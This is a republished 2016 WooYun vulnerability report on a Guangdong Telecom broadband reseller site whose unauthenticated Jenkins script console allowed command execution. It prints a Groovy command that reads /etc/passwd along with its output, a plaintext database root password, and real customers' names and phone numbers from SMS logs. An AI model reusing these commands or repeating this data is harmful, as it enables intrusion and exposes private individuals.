广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

admin 2017年4月27日21:35:18评论385 views字数 271阅读0分54秒阅读模式
摘要

2016-03-06: 细节已通知厂商并且等待厂商处理中
2016-03-10: 厂商已经确认,细节仅向厂商公开
2016-03-20: 细节向核心白帽子及相关领域专家公开
2016-03-30: 细节向普通白帽子公开
2016-04-09: 细节向实习白帽子公开
2016-04-24: 细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2016-181421

漏洞标题: 广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

相关厂商: 广东电信

漏洞作者: Weiy、

提交时间: 2016-03-06 12:00

公开时间: 2016-04-24 11:44

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 16

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 敏感信息泄露 未授权访问

0人收藏


漏洞详情

披露状态:

2016-03-06: 细节已通知厂商并且等待厂商处理中
2016-03-10: 厂商已经确认,细节仅向厂商公开
2016-03-20: 细节向核心白帽子及相关领域专家公开
2016-03-30: 细节向普通白帽子公开
2016-04-09: 细节向实习白帽子公开
2016-04-24: 细节向公众公开

简要描述:

广东电信某宽带代理商某处未授权访问导致命令执行、数据库泄漏导致用户信息大量泄漏、
铭感信息请审核打码。 我只想要安全的开个宽带、这都不行吗??????

审核顺便把 一月份我交的漏洞审核了了现在都三月了、谢谢:wooyun-2016-0167341

详细说明:

http://**.**.**.**/

广东电信宽带网络分销平台

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

code 区域
主办单位名称

深圳市万达世纪广告有限公司使用高级查询纠正信息
主办单位性质

企业
网站备案/许可证号

粤ICP备13059198号-1查看截图
网站名称

广东电信宽带网络分销平台
网站首页网址

**.**.**.**

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

http://**.**.**.**:8888/manage jenkins未授权访问

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

http://**.**.**.**:8888/script

命令执行、

code 区域
eth1      Link encap:Ethernet  HWaddr 02:00:40:51:00:F8  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::40ff:fe51:f8/64 Scope:Link

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

println "cat /etc/passwd".execute().text

code 区域
oot:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

利用 back.py 反弹shell 过来、

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

数据库信息

code 区域
# JDBC - MySQL connection settings
jdbc.url=jdbc:mysql://localhost/crunddb
jdbc.driver=com.mysql.jdbc.Driver
jdbc.user=md
jdbc.password=
jdbc.autoCommit=false

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

一些上传的图片信息可惜 下载不下了

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

http://**.**.**.**/upload/13332800028/20160302190142A005.jpg

http://**.**.**.**/upload/yhlxdn/20160303100618C085.jpg

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

在这个目录里存在大量的身份证信息

/usr/local/tomcat/webapps/yh/upload

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

找到了数据库

#MySQL Setting ########

database.driverClassName = com.mysql.jdbc.Driver

database.url = jdbc:mysql**.**.**.**:3306/wanda?useUnicode=true&characterEncoding=utf8

#database.url = jdbc:mysql://localhost:3306/wanda?useUnicode=true&characterEncoding=utf8

database.username = root

database.password = wandashiji

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

连接数据库、哈哈、

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

成功。

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

看看数据

两万多用户信息

wan_user 25922

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

code 区域

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

code 区域
2016-03-05 15:15:53 0 13377691499 252538 18929212921 您名下吕小刚的订单已经受理成功,接入号为:YFFADSLD2292094596,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:16:13 0 13377691499 252536 18929212921 您名下"易宗宝"的订单受理异常-挂起订单:【非光纤】地址非光纤,铜线ID:353727637
,请自行登录分销系统查看,谢谢!本短信由系统自动发出,请勿回复。 发送成功
2016-03-05 15:20:12 0 18922896002 252537 18922896002 您名下余彬的订单已经受理成功,接入号为:YFFADSLD2292094622,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:21:31 0 ns88xsj 252439 13928758128 您名下"刘志勇"的订单受理异常-挂起订单:【用户资料问题】地址不详,请提供详细地址,或提供铜线地址ID,请自行登录分销系统查看,谢谢!本短信由系统自动发出,请勿回复。 发送成功
2016-03-05 15:24:22 0 13377691499 252530 18929212921 您名下陈汉钦的订单已经受理成功,接入号为:YFFADSLD2292094646,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:26:22 0 13377691499 252508 18929212921 您名下"高倩"的订单受理异常-挂起订单:【用户资料问题】ID地址与单面地址不同,请自行登录分销系统查看,谢谢!本短信由系统自动发出,请勿回复。 发送成功
2016-03-05 15:40:08 0 13377691499 252508 18929212921 您名下高倩的订单已经受理成功,接入号为:YFFADSLD2292095806,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:44:48 0 18922896002 252534 18922896002 您名下曹海锋的订单已经受理成功,接入号为:YFFADSLD2292095836,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 16:07:16 0 13377691499 252548 18929212921 您名下崔安华的订单已经受理成功,接入号为:YFFADSLD2292096036,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

wan_order 111192

宽带安装信息

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

11万的客户信息安装宽带信息泄漏、

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

又是9千多的身份信息。

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

ok

漏洞证明:

在上面的了、

修复方案:

管理员自己补洞吧、、

版权声明:转载请注明来源 Weiy、@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-03-10 11:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-07 18:27 | fakeidentity ( 路人 | Rank:27 漏洞数:10 | 既然给了我天空,那还束缚我干吗)

    1

    朋友~有联系方式吗 厂家想找你。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin